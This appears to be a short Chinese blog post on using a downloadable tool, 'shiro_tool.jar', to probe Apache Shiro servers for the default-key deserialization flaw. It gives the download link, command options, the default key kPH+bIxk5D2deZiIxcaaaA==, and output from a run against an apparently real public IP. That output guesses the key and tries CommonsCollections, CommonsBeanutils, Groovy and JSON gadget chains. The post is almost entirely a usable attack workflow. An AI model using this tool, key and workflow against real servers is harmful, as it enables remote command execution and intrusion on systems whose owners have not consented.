Apache Shiro 漏洞检测

余生颓废 提交于 2020-12-17 13:50:37
  1. 检测工具
https://pan.baidu.com/s/1qCpm_E_Gw1VqSwkNyaWhEw      udwt
  1. 检测命令
检测是否使用shiro:java -cp shiro_tool.jar shiro.Check http://url

java -jar shiro_tool.jar https://xx.xx.xx.xx
nocheck --> skip check target is shiro or not.
key= --> set a shiro key.
req= --> request body file 抓包保存到文件里,这里写文件名
keys= --> keys file  自定义key的文件,key按行分割,即每行写一个

(存在默认密钥:kPH+bIxk5D2deZiIxcaaaA==攻击者可利用漏洞远程执行任意命令入侵服务器)
java -jar shiro_tool.jar https://xx.xx.xx.xx
[-] target: http://47.110.35.164:8080
[-] target is use shiro
[-] start guess shiro key...
[-] use shiro key: kPH+bIxk5D2deZiIxcaaaA==
[-] check CommonsBeanutils1
[-] check CommonsCollections1
[-] check CommonsCollections2
[-] check CommonsCollections3
[-] check CommonsCollections4
[-] check CommonsCollections5
[-] check CommonsCollections6
[-] check CommonsCollections7
[-] check CommonsCollections8
[-] check CommonsCollections9
[-] check CommonsCollections10
[-] check Groovy1
[-] check JSON1
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!